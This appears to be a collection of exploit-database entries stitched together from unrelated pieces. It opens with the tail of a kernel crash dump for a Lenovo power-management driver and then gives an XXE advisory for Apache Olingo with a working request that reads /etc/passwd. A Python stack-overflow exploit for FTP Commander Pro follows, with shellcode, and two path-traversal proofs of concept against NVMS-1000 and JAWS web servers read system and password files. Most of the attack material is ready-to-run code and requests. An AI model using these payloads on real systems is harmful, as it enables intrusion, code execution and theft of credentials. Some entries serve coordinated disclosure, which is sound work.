fea423dc9c9c08c703f6d9d5b0d8f7062b0ece68 THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 4653d18777ce51b05029c753677fc2c05d5811bb THREAD_SHA1_HASH_MOD: c2a3dbda00dbcf5ade5303449052a7349d5c580b FOLLOWUP_IP: pmdrvs+109d fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] FAULT_INSTR_CODE: 8941078b SYMBOL_STACK_INDEX: 0 FOLLOWUP_NAME: MachineOwner STACK_COMMAND: .cxr 0xffffc709dee8ec50 ; kb BUGCHECK_STR: 2E8B5A19 EXCEPTION_CODE_STR: 2E8B5A19 EXCEPTION_STR: WRONG_SYMBOLS PROCESS_NAME: ntoskrnl.wrong.symbols.exe IMAGE_NAME: ntoskrnl.wrong.symbols.exe MODULE_NAME: nt_wrong_symbols SYMBOL_NAME: nt_wrong_symbols!2E8B5A19A70000 BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145 DEFAULT_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145 PRIMARY_PROBLEM_CLASS: WRONG_SYMBOLS FAILURE_BUCKET_ID: WRONG_SYMBOLS_X64_17763.1.amd64fre.rs5_release.180914-1434_TIMESTAMP_940930-002145_2E8B5A19_nt_wrong_symbols!2E8B5A19A70000 TARGET_TIME: 2019-09-30T19:27:36.000Z OSBUILD: 17763 OSSERVICEPACK: 0 SERVICEPACK_NUMBER: 0 OS_REVISION: 0 SUITE_MASK: 272 PRODUCT_TYPE: 1 OSPLATFORM_TYPE: x64 OSNAME: Windows 10 OSEDITION: Windows 10 WinNt TerminalServer SingleUserTS OS_LOCALE: USER_LCID: 0 OSBUILD_TIMESTAMP: 1994-09-30 01:21:45 BUILDDATESTAMP_STR: 180914-1434 BUILDLAB_STR: rs5_release BUILDOSVER_STR: 10.0.17763.1.amd64fre.rs5_release.180914-1434 ANALYSIS_SESSION_ELAPSED_TIME: ae ANALYSIS_SOURCE: KM FAILURE_ID_HASH_STRING: km:wrong_symbols_x64_17763.1.amd64fre.rs5_release.180914-1434_timestamp_940930-002145_2e8b5a19_nt_wrong_symbols!2e8b5a19a70000 FAILURE_ID_HASH: {f0486cd4-fec7-73b9-14c0-31bcf2dd24e1} Followup: MachineOwner --------- 2: kd> u fffff804`28bf109d pmdrvs+0x109d: fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] fffff804`28bf109f 41894308 mov dword ptr [r11+8],eax fffff804`28bf10a3 e858ffffff call pmdrvs+0x1000 (fffff804`28bf1000) fffff804`28bf10a8 85c0 test eax,eax fffff804`28bf10aa 0f8582000000 jne pmdrvs+0x1132 (fffff804`28bf1132) fffff804`28bf10b0 488b8c2498000000 mov rcx,qword ptr [rsp+98h] fffff804`28bf10b8 4885c9 test rcx,rcx fffff804`28bf10bb 7475 je pmdrvs+0x1132 (fffff804`28bf1132) 2: kd> !for_each_frame .frame /r @$Frame _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx 00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f269040 rsp=ffffc709dee8e318 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!KeBugCheckEx: fffff804`1f269040 48894c2408 mov qword ptr [rsp+8],rcx ss:0018:ffffc709`dee8e320=000000000000003b _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09 01 ffffc709`dee8e320 fffff804`1f279d3c nt!setjmpex+0x7f09 rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f27a8e9 rsp=ffffc709dee8e320 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x7f09: fffff804`1f27a8e9 90 nop _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c 02 ffffc709`dee8e460 fffff804`1f271b4f nt!setjmpex+0x735c rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f279d3c rsp=ffffc709dee8e460 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x735c: fffff804`1f279d3c b801000000 mov eax,1 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f 03 ffffc709`dee8e4a0 fffff804`1f1ca460 nt!_chkstk+0x41f rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f271b4f rsp=ffffc709dee8e4a0 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!_chkstk+0x41f: fffff804`1f271b4f 0f1f00 nop dword ptr [rax] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440 04 ffffc709`dee8e4d0 fffff804`1f0d7c24 nt!RtlUnwindEx+0x3440 rax=ffffc709dee8e420 rbx=ffffc709dee8fa00 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8eaf0 rdi=0000000000000000 rip=fffff8041f1ca460 rsp=ffffc709dee8e4d0 rbp=ffffc709dee8ea10 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=fffff8041f27a305 r13=ffffc709dee8e510 r14=0000000000000000 r15=ffffc709dee8f408 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!RtlUnwindEx+0x3440: fffff804`1f1ca460 8bd0 mov edx,eax _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264 05 ffffc709`dee8ec20 fffff804`1f27a9c2 nt!ExReleaseAutoExpandPushLockExclusive+0x264 rax=ffffc709dee8e420 rbx=ffffc709dee8f408 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffc709dee8ec50 rdi=0000000000000000 rip=fffff8041f0d7c24 rsp=ffffc709dee8ec20 rbp=ffffc709dee8f150 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=000000000010001f r13=ffffca04c1ca8d40 r14=ffffc709dee8f4b0 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!ExReleaseAutoExpandPushLockExclusive+0x264: fffff804`1f0d7c24 84c0 test al,al _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2 06 ffffc709`dee8f2d0 fffff804`1f276cae nt!setjmpex+0x7fe2 rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000 rip=fffff8041f27a9c2 rsp=ffffc709dee8f2d0 rbp=ffffc709dee8f530 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x7fe2: fffff804`1f27a9c2 488d8c2400010000 lea rcx,[rsp+100h] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce 07 ffffc709`dee8f4b0 fffff804`28bf109d nt!setjmpex+0x42ce rax=ffffc709dee8e420 rbx=ffffca04ca8f80a0 rcx=000000000000003b rdx=00000000c0000005 rsi=ffffca04ca8f8170 rdi=0000000000000000 rip=fffff8041f276cae rsp=ffffc709dee8f4b0 rbp=ffffc709dee8f530 r8=fffff80428bf109d r9=ffffc709dee8ec50 r10=0000000000000000 r11=000000001f0b5000 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x42ce: fffff804`1f276cae 440f20c0 mov rax,cr8 _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d 08 ffffc709`dee8f640 fffff804`28bf5060 pmdrvs+0x109d rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=ffffca04ca8f8170 rdi=0000000000000000 rip=fffff80428bf109d rsp=ffffc709dee8f640 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 pmdrvs+0x109d: fffff804`28bf109d 8b07 mov eax,dword ptr [rdi] ds:002b:00000000`00000000=???????? _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060 09 ffffc709`dee8f6c0 fffff804`1f12dba9 pmdrvs+0x5060 rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=0000000000000000 rip=fffff80428bf5060 rsp=ffffc709dee8f6c0 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 pmdrvs+0x5060: fffff804`28bf5060 eb28 jmp pmdrvs+0x508a (fffff804`28bf508a) _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59 0a ffffc709`dee8f6f0 fffff804`1f6abb11 nt!IofCallDriver+0x59 rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290 rip=fffff8041f12dba9 rsp=ffffc709dee8f6f0 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!IofCallDriver+0x59: fffff804`1f12dba9 4883c438 add rsp,38h _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071 0b ffffc709`dee8f730 fffff804`1f6d763c nt!NtQueryInformationFile+0x1071 rax=fffff80428bf5020 rbx=ffffca04ca8f80a0 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=0000000000000001 rdi=ffffca04cc188290 rip=fffff8041f6abb11 rsp=ffffc709dee8f730 rbp=ffffca04cc188290 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=ffffca04c1ca8d40 r14=0000000000000002 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!NtQueryInformationFile+0x1071: fffff804`1f6abb11 448bf0 mov r14d,eax _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc 0c ffffc709`dee8f7e0 fffff804`1f64c356 nt!NtClose+0xffc rax=fffff80428bf5020 rbx=ffffca04cc188290 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=0000000000000000 rdi=ffffca04ca8f80a0 rip=fffff8041f6d763c rsp=ffffc709dee8f7e0 rbp=ffffc709dee8fa80 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=ffffca04ca8f81b8 r13=fffff780000002dc r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!NtClose+0xffc: fffff804`1f6d763c eb25 jmp nt!NtClose+0x1023 (fffff804`1f6d7663) _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56 0d ffffc709`dee8f920 fffff804`1f27a305 nt!NtDeviceIoControlFile+0x56 rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8 rip=fffff8041f64c356 rsp=ffffc709dee8f920 rbp=ffffc709dee8fa80 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!NtDeviceIoControlFile+0x56: fffff804`1f64c356 4883c468 add rsp,68h _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925 0e ffffc709`dee8f990 00007fff`33aaf844 nt!setjmpex+0x7925 rax=fffff80428bf5020 rbx=ffffca04c88b3080 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=000000000068fd18 rdi=ffffc709dee8f9a8 rip=fffff8041f27a305 rsp=ffffc709dee8f990 rbp=ffffc709dee8fa80 r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 nt!setjmpex+0x7925: fffff804`1f27a305 0f1f00 nop dword ptr [rax] _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844 0f 00000000`0068fcf8 00000000`00000000 0x00007fff`33aaf844 rax=fffff80428bf5020 rbx=0000000000000000 rcx=ffffc709dee8f6d8 rdx=ffffca04ca8f8170 rsi=00000000deadbeef rdi=000000000000004c rip=00007fff33aaf844 rsp=000000000068fcf8 rbp=000000000000004c r8=000000000000000e r9=ffffca04c1ca8d40 r10=fffff80428bf5020 r11=ffffc709dee8f6b8 r12=0000000000000000 r13=0000000000000010 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei ng nz na pe nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000282 00007fff`33aaf844 ?? ??? _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 00 ffffc709`dee8e318 fffff804`1f27a8e9 nt!KeBugCheckEx # Mitigation Update to Lenovo Power Management driver version 1.67.17.48 or higher

############################################################# # # COMPASS SECURITY ADVISORY # https://www.compass-security.com/research/advisories/ # ############################################################# # # Product: Apache Olingo OData 4.0 # Vendor: Apache Foundation # CSNC ID: CSNC-2009-025 # CVE ID: CVE-2019-17554 # Subject: XML External Entity Resolution (XXE) # Risk: High # Effect: Remotely exploitable # Author: Archibald Haddock (advisories@compass-security.com) # Date: 08.11.2019 # ############################################################# Introduction: ------------- Apache Olingo is a Java library that implements the Open Data Protocol (OData). [1] XML data is parsed by insecurley configured software components, which can be abused for XML External Entity Attacks [2]. Affected: --------- Vulnerable: * Olingo OData 4.x.x to 4.6.x Not vulnerable: * Olingo OData 4.7.0 * The Olingo OData 2.0 implementation has XXE protection since 1.1.0-RC01 Technical Description --------------------- The XML content type entity deserializer is not configured to deny the resolution of external entities. Request with content type "application/xml", which trigger the deserialization of entities, can be used to trigger XXE attacks. Request ====== POST /odata-server-sample/cars.svc/Cars HTTP/1.1 Host: localhost:8081 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://localhost:8081/odata-server-sample/ Cookie: JSESSIONID=17C3158153CDC2CA1DBA0E77D4AFC3B0 Upgrade-Insecure-Requests: 1 content-type: application/xml Content-Length: 1101 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars/$entity"> <a:id>Cars(1)</a:id> <a:title></a:title> <a:summary></a:summary> <a:updated>2019-11-08T15:10:30Z</a:updated> <a:author> <a:name></a:name> </a:author> <a:link rel="edit" href="Cars(1)"></a:link> <a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link> <a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category> <a:content type="application/xml"> <m:properties> <d:Id m:type="Int16">1</d:Id> <d:Model>F1 &xxe;</d:Model> <d:ModelYear>2012</d:ModelYear> <d:Price m:type="Decimal">189189.43</d:Price> <d:Currency>EUR</d:Currency> </m:properties> </a:content> </a:entry> Response ======== HTTP/1.1 201 Created Server: Apache-Coyote/1.1 OData-Version: 4.0 Content-Type: application/xml Content-Length: 960 Date: Fri, 08 Nov 2019 14:22:35 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?><a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars"><a:id>Cars(1)</a:id><a:title></a:title><a:summary></a:summary><a:updated>2019-11-08T15:22:35Z</a:updated><a:author><a:name></a:name></a:author><a:link rel="edit" href="Cars(1)"></a:link><a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link><a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category><a:content type="application/xml"><m:properties><d:Id m:type="Int16">1</d:Id><d:Model> myuser:x:1000:1000:,,,:/home/myuser:/bin/bash </d:Model><d:ModelYear>2012</d:ModelYear><d:Price m:type="Decimal">189189.43</d:Price><d:Currency>EUR</d:Currency></m:properties></a:content></a:entry> Workaround / Fix: ----------------- Configure the XML reader securely [3]. In org.apache.olingo.server.core.deserializer.xml.ODataXmlDeserializer.java on line 70 a javax.xml.stream.XMLInputFactory is instanciated: private static final XMLInputFactory FACTORY = XMLInputFactory.newFactory(); The XMLInputFactory should be configured, not to resolve external entities: FACTORY.setProperty(XMLInputFactory.SUPPORT_DTD, false); FACTORY.setProperty("javax.xml.stream.isSupportingExternalEntities", false); Timeline: --------- 2019-11-08: Discovery by Compass Security 2019-11-08: Initial vendor notification 2019-11-08: Initial vendor response 2019-12-04: Release of fixed Version / Patch [4] 2019-12-05: Coordinated public disclosure date [1] https://olingo.apache.org/ [2] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing [3] https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html [4] https://mail-archives.apache.org/mod_mbox/olingo-user/201912.mbox/%3CCAGSZ4d7Ty%3DL-n_iAzT6vcQp65BY29XZDS5tMoM8MdDrb1moM7A%40mail.gmail.com%3E Source: https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2019-025_apache_xxe.txt

# Exploit Title: FTP Commander Pro 8.03 - Local Stack Overflow # Date: 2019-12-12 # Exploit Author: boku # Discovered by: UN_NON # Original DoS: FTP Commander 8.02 - Overwrite (SEH) # Original DoS Link: https://www.exploit-db.com/exploits/37810 # Software Vendor: http://www.internet-soft.com/ # Software Link: http://www.internet-soft.com/DEMO/cftpsetup.exe # Version: Version 8.03 & Version 8.02 (same exploit for both) # Tested on: Windows 10 Home 1909 (64-bit; OS-build=18363.418) # Windows 10 Education 1909 (32-bit; OS-build=18363.418) # Windows 10 Pro 1909 (32-bit; OS-build=18363.418) # Windows Vista Home Basic SP1 (6.0.6001 Build 6001) # Windows XP Professional (32-bit)- 5.1.2600 Service Pack 3 Build 2600 # Python Version: Python 2.7.16+ # Recreate: # 1) Generate 'poc.txt' payload using python 2.7.x # 2) On target Windows machine, open the file 'poc.txt' with notepad, then Select-All & Copy # 3) Install & Open ftpCommander v8.03 (or v8.02) # 4) Go to Menu Bar > FTP-Server Drop-down > click Custom Command # - A textbox will appear on the bottom of the right window # 5) Paste payload from generated txt file into textbox # 6) Click "Do it" # - The program will crash & calculator will open # Other Security Issue: # - The program's default install path is: C:\\cftp\cftp.exe #!/usr/bin/python blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # bash green success bullet err = '\033[91m[\033[0m!\033[91m]\033[0m ' # bash red error bullet try: # EIP offset at 4108 -- if you exceed 4112 bytes you will overwrite nSEH & SEH nops='CGS[BOKU]J'*100 # 1000 nops that are ASCII friendly # EIP jump lands at the beginning of the buffer # Shellcode can be up to 4108 bytes by adjusting nops & replacing shellcode # msfvenom -p windows/exec CMD='calc' -b '\x00' --platform windows -v shellcode -a x86 -f python -e x86/alpha_upper #x86/alpha_upper succeeded with size 447 (iteration=0) shellcode = b"" shellcode += b"\x89\xe7\xda\xd6\xd9\x77\xf4\x58\x50\x59\x49" shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a" shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30" shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41" shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42" shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" shellcode += b"\x49\x4b\x4c\x4a\x48\x4d\x52\x35\x50\x35\x50" shellcode += b"\x33\x30\x53\x50\x4c\x49\x4d\x35\x50\x31\x39" shellcode += b"\x50\x52\x44\x4c\x4b\x50\x50\x56\x50\x4c\x4b" shellcode += b"\x46\x32\x44\x4c\x4c\x4b\x31\x42\x42\x34\x4c" shellcode += b"\x4b\x42\x52\x46\x48\x34\x4f\x4f\x47\x51\x5a" shellcode += b"\x51\x36\x36\x51\x4b\x4f\x4e\x4c\x37\x4c\x33" shellcode += b"\x51\x33\x4c\x44\x42\x56\x4c\x57\x50\x4f\x31" shellcode += b"\x58\x4f\x54\x4d\x45\x51\x4f\x37\x5a\x42\x4b" shellcode += b"\x42\x36\x32\x30\x57\x4c\x4b\x51\x42\x34\x50" shellcode += b"\x4c\x4b\x50\x4a\x57\x4c\x4c\x4b\x30\x4c\x32" shellcode += b"\x31\x34\x38\x4b\x53\x57\x38\x43\x31\x4e\x31" shellcode += b"\x46\x31\x4c\x4b\x31\x49\x51\x30\x45\x51\x48" shellcode += b"\x53\x4c\x4b\x47\x39\x44\x58\x4b\x53\x37\x4a" shellcode += b"\x31\x59\x4c\x4b\x56\x54\x4c\x4b\x35\x51\x4e" shellcode += b"\x36\x50\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f" shellcode += b"\x34\x4d\x45\x51\x59\x57\x30\x38\x4b\x50\x43" shellcode += b"\x45\x5a\x56\x55\x53\x33\x4d\x4a\x58\x57\x4b" shellcode += b"\x53\x4d\x31\x34\x54\x35\x4a\x44\x36\x38\x4c" shellcode += b"\x4b\x31\x48\x36\x44\x45\x51\x38\x53\x35\x36" shellcode += b"\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x30\x58\x35" shellcode += b"\x4c\x53\x31\x49\x43\x4c\x4b\x44\x44\x4c\x4b" shellcode += b"\x55\x51\x38\x50\x4d\x59\x47\x34\x31\x34\x56" shellcode += b"\x44\x51\x4b\x51\x4b\x55\x31\x46\x39\x31\x4a" shellcode += b"\x30\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x50" shellcode += b"\x5a\x4c\x4b\x42\x32\x4a\x4b\x4c\x4d\x31\x4d" shellcode += b"\x53\x5a\x33\x31\x4c\x4d\x4b\x35\x48\x32\x33" shellcode += b"\x30\x55\x50\x33\x30\x56\x30\x32\x48\x30\x31" shellcode += b"\x4c\x4b\x42\x4f\x4d\x57\x4b\x4f\x38\x55\x4f" shellcode += b"\x4b\x4c\x30\x4f\x45\x59\x32\x56\x36\x55\x38" shellcode += b"\x59\x36\x5a\x35\x4f\x4d\x4d\x4d\x4b\x4f\x59" shellcode += b"\x45\x37\x4c\x54\x46\x43\x4c\x54\x4a\x4d\x50" shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x33\x35\x4f\x4b\x51" shellcode += b"\x57\x32\x33\x53\x42\x52\x4f\x42\x4a\x35\x50" shellcode += b"\x50\x53\x4b\x4f\x39\x45\x42\x43\x53\x51\x42" shellcode += b"\x4c\x32\x43\x53\x30\x41\x41" # Fill the rest of the space with B's until we are at our EIP offset offset = '\x42'*(4108-len(nops+shellcode)) # The EAX register holds a Pointer to the beginning of our buffer # FF20 = jmp [eax] # !mona find -o -s '\xFF\x20' # 0x0041081a : '\xFF\x20' | startnull,ascii {PAGE_EXECUTE_READ} [ftpcomm.exe] # | ASLR: False; Rebase: False; SafeSEH: False; eip = '\x1a\x08\x41' # 3 byte overwrite so we can set EIP to start with 0x00 # After jmp [eax], we land at the beginning of our buffer payload = nops+shellcode+offset+eip File = 'poc.txt' f = open(File, 'w') # open file for write f.write(payload) f.close() # close the file print blt + File + " created successfully " except: print err + File + ' failed to create'

# Title: NVMS-1000 - Directory Traversal # Date: 2019-12-12 # Author: Numan Türle # Vendor Homepage: http://en.tvt.net.cn/ # Version : N/A # Software Link : http://en.tvt.net.cn/products/188.html POC --------- GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 Host: 12.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close Response --------- ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1

# Title: Bullwark Momentum Series JAWS 1.0 - Directory Traversal # Date: 2019-12-11 # Author: Numan Türle # Vendor Homepage: http://www.bullwark.net/ # Version : Bullwark Momentum Series Web Server JAWS/1.0 # Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 POC --------- GET /../../../../../../../../../../../../etc/passwd HTTP/1.1 Host: 12.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close Response --------- root:ABgia2Z.lfFhA:0:0::/root:/bin/sh

